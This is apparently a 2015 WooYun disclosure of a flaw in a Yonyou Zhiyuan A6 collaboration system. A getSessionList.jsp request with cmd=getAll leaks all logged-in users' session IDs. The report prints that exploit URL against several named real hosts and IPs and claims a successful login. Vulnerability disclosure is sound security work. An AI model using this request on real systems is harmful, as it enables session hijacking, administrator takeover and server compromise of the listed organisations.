漏洞概要
关注数(24)
关注此漏洞
>
漏洞详情
披露状态:
2015-03-20: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开
简要描述:
用友致远A6协同管理高危漏洞二
详细说明:
该漏洞泄露了当前登录用户(所有登录的)的SessionID;
利用泄露的SessionID即可登录该用户,包括管理员,进入后getshell毫无压力
/yyoa/ext/https/getSessionList.jsp
部分代码
从上面的代码可知,当cmd参数为getAll时,便可获取到所有用户的SessionID
例如:
http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
案例:
http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://110.167.194.10:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll
漏洞证明:
利用获取到的sessionid,成功登录用户。

修复方案:
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-06-23 16:32
厂商回复:
最新状态:
暂无